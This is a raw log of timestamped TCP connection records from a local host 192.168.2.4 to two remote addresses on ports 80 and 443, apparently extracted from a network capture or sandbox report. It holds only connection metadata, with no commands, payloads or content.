                                                                                                                                                                Sep 27, 2024 17:42:56.020883083 CEST4984180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:56.021190882 CEST4984580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:56.026030064 CEST8049845185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:56.026098013 CEST4984580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:56.026125908 CEST8049841185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:56.026176929 CEST4984180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:56.026388884 CEST4984580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:56.031153917 CEST8049845185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:56.076231003 CEST44349843172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:56.076811075 CEST44349843172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:56.076940060 CEST49843443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:56.077148914 CEST49843443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:56.077194929 CEST44349843172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:56.077224016 CEST49843443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:56.077239990 CEST44349843172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:56.176706076 CEST44349844172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:56.176826000 CEST44349844172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:56.177737951 CEST49844443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:56.224059105 CEST49844443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:56.224083900 CEST44349844172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:56.335350990 CEST49846443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:56.335402012 CEST44349846172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:56.335577965 CEST49846443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:56.335982084 CEST49846443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:56.335998058 CEST44349846172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:56.642117977 CEST49847443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:56.642159939 CEST44349847172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:56.642258883 CEST49847443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:56.642817020 CEST49847443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:56.642831087 CEST44349847172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:56.763569117 CEST8049845185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:56.763628006 CEST4984580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:56.764302015 CEST4984580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:56.771935940 CEST8049845185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:56.798089027 CEST44349846172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:56.798170090 CEST49846443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:56.799619913 CEST49846443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:56.799628019 CEST44349846172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:56.799995899 CEST44349846172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:56.800795078 CEST49846443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:56.847399950 CEST44349846172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:57.000869989 CEST8049845185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:57.001137972 CEST4984580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:57.247339010 CEST4984580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:57.251054049 CEST4984880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:57.314769983 CEST44349846172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:57.315000057 CEST44349846172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:57.315033913 CEST44349847172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:57.315067053 CEST49846443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:57.315107107 CEST49847443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:57.316293955 CEST8049848185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:57.316313028 CEST8049845185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:57.316402912 CEST4984580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:57.316416979 CEST4984880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:57.372451067 CEST49846443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:57.372490883 CEST44349846172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:57.375807047 CEST4984880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:57.380925894 CEST8049848185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:57.424669027 CEST49847443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:57.424709082 CEST44349847172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:57.425144911 CEST44349847172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:57.500971079 CEST49847443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:57.515204906 CEST49847443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:57.555412054 CEST44349847172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:57.744354963 CEST49849443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:57.744405031 CEST44349849172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:57.744462967 CEST49849443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:57.747149944 CEST49849443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:57.747165918 CEST44349849172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:57.905369997 CEST44349847172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:57.905807972 CEST44349847172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:57.905941963 CEST49847443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:57.906143904 CEST49847443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:57.906167030 CEST44349847172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:57.906178951 CEST49847443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:57.906184912 CEST44349847172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:58.039949894 CEST8049848185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:58.040015936 CEST4984880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:58.040699005 CEST4984880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:58.045465946 CEST8049848185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:58.216350079 CEST44349849172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:58.216434956 CEST49849443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:58.217760086 CEST49849443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:58.217768908 CEST44349849172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:58.218555927 CEST44349849172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:58.219816923 CEST49849443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:58.267417908 CEST44349849172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:58.272742987 CEST8049848185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:58.273175955 CEST4984880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:58.379849911 CEST4984880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:58.380194902 CEST4985080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:58.385795116 CEST8049850185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:58.385827065 CEST8049848185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:58.385869026 CEST4985080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:58.385889053 CEST4984880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:58.386059999 CEST4985080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:58.391747952 CEST8049850185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:58.467793941 CEST44349849172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:58.468060970 CEST44349849172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:58.468130112 CEST49849443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:58.468211889 CEST49849443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:58.468241930 CEST44349849172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:58.468255043 CEST49849443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:58.468262911 CEST44349849172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:58.558422089 CEST49851443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:58.558473110 CEST44349851172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:58.558742046 CEST49851443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:58.560009003 CEST49851443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:58.560024023 CEST44349851172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:58.726267099 CEST49852443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:58.726357937 CEST44349852172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:58.726448059 CEST49852443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:58.726752996 CEST49852443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:58.726793051 CEST44349852172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:59.023612022 CEST44349851172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:59.023695946 CEST49851443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:59.028336048 CEST49851443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:59.028347969 CEST44349851172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:59.028667927 CEST44349851172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:59.029563904 CEST49851443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:59.071444988 CEST44349851172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:59.085181952 CEST8049850185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:59.085341930 CEST4985080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:59.086059093 CEST4985080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:59.090873957 CEST8049850185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:59.186939955 CEST44349852172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:59.187073946 CEST49852443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:59.188261032 CEST49852443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:59.188292027 CEST44349852172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:59.188633919 CEST44349852172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:59.189476967 CEST49852443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:59.231431961 CEST44349852172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:59.314188004 CEST8049850185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:59.315965891 CEST4985080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:59.428193092 CEST4985080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:59.429255962 CEST4985380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:59.434278011 CEST8049853185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:59.434369087 CEST4985380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:59.434602976 CEST8049850185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:59.434667110 CEST4985080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:59.436224937 CEST4985380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:59.441422939 CEST8049853185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:59.443219900 CEST44349851172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:59.443335056 CEST44349851172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:59.443571091 CEST49851443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:59.443818092 CEST49851443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:59.443834066 CEST44349851172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:59.603265047 CEST44349852172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:59.603398085 CEST44349852172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:59.603491068 CEST49852443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:59.603703022 CEST49852443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:59.603734016 CEST44349852172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:59.603749990 CEST49852443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:59.603758097 CEST44349852172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.127280951 CEST8049853185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.127362013 CEST4985380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:00.128468990 CEST4985380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:00.133404970 CEST8049853185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.243108034 CEST49854443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:00.243172884 CEST44349854172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.243257046 CEST49854443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:00.243798971 CEST49854443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:00.243813038 CEST44349854172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.351398945 CEST8049853185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.351476908 CEST4985380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:00.430638075 CEST49855443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:00.430723906 CEST44349855172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.430813074 CEST49855443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:00.431143999 CEST49855443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:00.431180954 CEST44349855172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.459887028 CEST4985380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:00.460190058 CEST4985680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:00.465019941 CEST8049853185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.465061903 CEST8049856185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.465095997 CEST4985380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:00.465137959 CEST4985680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:00.465286016 CEST4985680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:00.470310926 CEST8049856185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.729223013 CEST44349854172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.729319096 CEST49854443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:00.753884077 CEST49854443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:00.753917933 CEST44349854172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.754992962 CEST44349854172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.756288052 CEST49854443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:00.803395033 CEST44349854172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.904158115 CEST44349855172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.904236078 CEST49855443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:00.912453890 CEST49855443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:00.912502050 CEST44349855172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.912755966 CEST44349855172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.913563013 CEST49855443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:00.955420017 CEST44349855172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.145847082 CEST44349854172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.147417068 CEST44349854172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.147476912 CEST49854443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.147613049 CEST49854443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.147636890 CEST44349854172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.174545050 CEST8049856185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.174611092 CEST4985680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:01.175760031 CEST4985680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:01.180854082 CEST8049856185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.330921888 CEST44349855172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.331015110 CEST44349855172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.331073046 CEST49855443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.333081007 CEST49855443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.333110094 CEST44349855172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.333126068 CEST49855443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.333133936 CEST44349855172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.408756018 CEST8049856185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.408818960 CEST4985680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:01.445797920 CEST49857443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.445846081 CEST44349857172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.446233988 CEST49857443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.447079897 CEST49857443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.447088957 CEST44349857172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.520638943 CEST4985680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:01.521023989 CEST4985880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:01.526284933 CEST8049858185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.526391983 CEST4985880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:01.526613951 CEST4985880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:01.527373075 CEST8049856185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.527519941 CEST4985680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:01.531650066 CEST8049858185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.620300055 CEST49859443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.620346069 CEST44349859172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.620493889 CEST49859443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.620891094 CEST49859443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.620902061 CEST44349859172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.919080973 CEST44349857172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.919142008 CEST49857443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.920648098 CEST49857443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.920659065 CEST44349857172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.920969009 CEST44349857172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.922738075 CEST49857443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.967395067 CEST44349857172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.102308989 CEST44349859172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.102407932 CEST49859443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.103806019 CEST49859443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.103823900 CEST44349859172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.104115009 CEST44349859172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.108150005 CEST49859443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.155395031 CEST44349859172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.382951975 CEST8049858185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.383399963 CEST4985880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:02.383466959 CEST44349857172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.383578062 CEST44349857172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.383640051 CEST49857443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.419157028 CEST4985880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:02.419399023 CEST49857443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.419424057 CEST44349857172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.419435024 CEST49857443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.419440985 CEST44349857172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.424479961 CEST8049858185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.555979967 CEST44349859172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.556057930 CEST44349859172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.556134939 CEST49859443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.679337978 CEST8049858185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.682002068 CEST4985880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:02.709346056 CEST49859443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.709371090 CEST44349859172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.709420919 CEST49859443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.709427118 CEST44349859172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.803108931 CEST4985880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:02.803544044 CEST4986080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:02.809161901 CEST8049860185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.809382915 CEST4986080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:02.810136080 CEST4986080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:02.810519934 CEST8049858185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.810606003 CEST4985880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:02.815181017 CEST8049860185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.851325989 CEST49861443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.851391077 CEST44349861172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.851541042 CEST49861443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.851938009 CEST49861443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.851963043 CEST44349861172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.085690975 CEST49862443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:03.085736990 CEST44349862172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.085863113 CEST49862443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:03.086611986 CEST49862443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:03.086643934 CEST44349862172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.418663025 CEST44349861172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.418745995 CEST49861443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:03.420384884 CEST49861443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:03.420396090 CEST44349861172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.420703888 CEST44349861172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.424892902 CEST49861443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:03.467415094 CEST44349861172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.525504112 CEST8049860185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.525618076 CEST4986080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:03.527072906 CEST4986080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:03.531981945 CEST8049860185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.548652887 CEST44349862172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.548769951 CEST49862443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:03.550146103 CEST49862443192.168.2.4172.67.187.100
